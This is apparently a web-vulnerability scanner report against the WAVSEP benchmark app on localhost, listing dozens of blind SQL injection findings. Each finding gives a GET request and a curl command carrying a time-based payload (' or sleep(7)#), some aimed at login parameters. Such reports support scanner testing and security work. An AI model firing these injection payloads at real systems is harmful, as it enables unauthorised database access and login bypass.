Date of the scan: Tue, 29 May 2018 02:00:16 +0000. Scope of the scan: domain
| Category | Number of vulnerabilities found |
|---|---|
| SQL Injection | 0 |
| Blind SQL Injection | 66 |
| File Handling | 1820 |
| Cross Site Scripting | 226 |
| CRLF Injection | 0 |
| Commands execution | 0 |
| Htaccess Bypass | 0 |
| Backup file | 0 |
| Potentially dangerous file | 0 |
| Server Side Request Forgery | 76 |
| Internal Server Error | 550 |
| Resource consumption | 0 |
Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error-Experimental/Case01-InjectionInInsertValues-String-BinaryDeliberateRuntimeError-With200Errors.jsp?msg=%27%20or%20sleep%287%29%3D%27&target=a%40a.com HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error-Experimental/Case01-InjectionInInsertValues-String-BinaryDeliberateRuntimeError-With200Errors.jsp?msg=%27%20or%20sleep%287%29%3D%27&target=a%40a.com"
Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case01-InjectionInLogin-String-LoginBypass-With200Errors.jsp?username=%27%20or%20sleep%287%29%231&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case01-InjectionInLogin-String-LoginBypass-With200Errors.jsp?username=%27%20or%20sleep%287%29%231&password=textvalue2"
Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case02-InjectionInSearch-String-UnionExploit-With200Errors.jsp?msg=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case02-InjectionInSearch-String-UnionExploit-With200Errors.jsp?msg=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case03-InjectionInCalc-String-BooleanExploit-With200Errors.jsp?username=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case03-InjectionInCalc-String-BooleanExploit-With200Errors.jsp?username=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case04-InjectionInUpdate-String-CommandInjection-With200Errors.jsp?msg=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case04-InjectionInUpdate-String-CommandInjection-With200Errors.jsp?msg=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp?transactionId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp?transactionId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp?msgId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp?msgId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp?minBalanace=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp?minBalanace=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp?msgid=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp?msgid=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case11-InjectionInView-Date-PermissionBypass-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case11-InjectionInView-Date-PermissionBypass-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case12-InjectionInSearch-Date-UnionExploit-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case12-InjectionInSearch-Date-UnionExploit-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case13-InjectionInCalc-Date-BooleanExploit-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case13-InjectionInCalc-Date-BooleanExploit-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case14-InjectionInUpdate-Date-CommandInjection-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case14-InjectionInUpdate-Date-CommandInjection-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp?transactionDate=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp?transactionDate=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp?transactionId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp?transactionId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp?msgId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp?msgId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp?minBalanace=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp?minBalanace=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp?msgid=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp?msgid=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case01-InjectionInView-Numeric-Blind-200ValidResponseWithDefaultOnException.jsp?transactionId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case01-InjectionInView-Numeric-Blind-200ValidResponseWithDefaultOnException.jsp?transactionId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case02-InjectionInView-String-Blind-200ValidResponseWithDefaultOnException.jsp?username=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case02-InjectionInView-String-Blind-200ValidResponseWithDefaultOnException.jsp?username=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case03-InjectionInView-Date-Blind-200ValidResponseWithDefaultOnException.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case03-InjectionInView-Date-Blind-200ValidResponseWithDefaultOnException.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case04-InjectionInUpdate-Numeric-TimeDelayExploit-200Identical.jsp?transactionId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case04-InjectionInUpdate-Numeric-TimeDelayExploit-200Identical.jsp?transactionId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter description
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case05-InjectionInUpdate-String-TimeDelayExploit-200Identical.jsp?description=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case05-InjectionInUpdate-String-TimeDelayExploit-200Identical.jsp?description=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case06-InjectionInUpdate-Date-TimeDelayExploit-200Identical.jsp?transactionDate=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case06-InjectionInUpdate-Date-TimeDelayExploit-200Identical.jsp?transactionDate=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case07-InjectionInUpdate-NumericWithoutQuotes-TimeDelayExploit-200Identical.jsp?transactionId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case07-InjectionInUpdate-NumericWithoutQuotes-TimeDelayExploit-200Identical.jsp?transactionId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case08-InjectionInUpdate-DateWithoutQuotes-TimeDelayExploit-200Identical.jsp?transactionDate=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case08-InjectionInUpdate-DateWithoutQuotes-TimeDelayExploit-200Identical.jsp?transactionDate=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case01-InjectionInLogin-String-LoginBypass-WithDifferent200Responses.jsp?username=%27%20or%20sleep%287%29%231&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case01-InjectionInLogin-String-LoginBypass-WithDifferent200Responses.jsp?username=%27%20or%20sleep%287%29%231&password=textvalue2"
Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case02-InjectionInSearch-String-UnionExploit-WithDifferent200Responses.jsp?msg=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case02-InjectionInSearch-String-UnionExploit-WithDifferent200Responses.jsp?msg=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case03-InjectionInCalc-String-BooleanExploit-WithDifferent200Responses.jsp?username=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case03-InjectionInCalc-String-BooleanExploit-WithDifferent200Responses.jsp?username=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case04-InjectionInUpdate-String-CommandInjection-WithDifferent200Responses.jsp?msg=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case04-InjectionInUpdate-String-CommandInjection-WithDifferent200Responses.jsp?msg=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithDifferent200Responses.jsp?orderby=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithDifferent200Responses.jsp?orderby=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case06-InjectionInView-Numeric-PermissionBypass-WithDifferent200Responses.jsp?transactionId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case06-InjectionInView-Numeric-PermissionBypass-WithDifferent200Responses.jsp?transactionId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case07-InjectionInSearch-Numeric-UnionExploit-WithDifferent200Responses.jsp?msgId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case07-InjectionInSearch-Numeric-UnionExploit-WithDifferent200Responses.jsp?msgId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case08-InjectionInCalc-Numeric-BooleanExploit-WithDifferent200Responses.jsp?minBalanace=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case08-InjectionInCalc-Numeric-BooleanExploit-WithDifferent200Responses.jsp?minBalanace=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case09-InjectionInUpdate-Numeric-CommandInjection-WithDifferent200Responses.jsp?msgid=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case09-InjectionInUpdate-Numeric-CommandInjection-WithDifferent200Responses.jsp?msgid=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithDifferent200Responses.jsp?orderby=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithDifferent200Responses.jsp?orderby=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case11-InjectionInView-Date-PermissionBypass-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case11-InjectionInView-Date-PermissionBypass-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case12-InjectionInSearch-Date-UnionExploit-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case12-InjectionInSearch-Date-UnionExploit-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case13-InjectionInCalc-Date-BooleanExploit-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case13-InjectionInCalc-Date-BooleanExploit-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case14-InjectionInUpdate-Date-CommandInjection-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case14-InjectionInUpdate-Date-CommandInjection-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithDifferent200Responses.jsp?transactionDate=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithDifferent200Responses.jsp?transactionDate=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithDifferent200Responses.jsp?transactionId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithDifferent200Responses.jsp?transactionId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithDifferent200Responses.jsp?msgId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithDifferent200Responses.jsp?msgId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithDifferent200Responses.jsp?minBalanace=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithDifferent200Responses.jsp?minBalanace=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithDifferent200Responses.jsp?msgid=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithDifferent200Responses.jsp?msgid=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=%27%20or%20sleep%287%29%231&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=%27%20or%20sleep%287%29%231&password=textvalue2"
Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp?msg=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp?msg=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp?username=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp?username=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp?msg=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp?msg=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
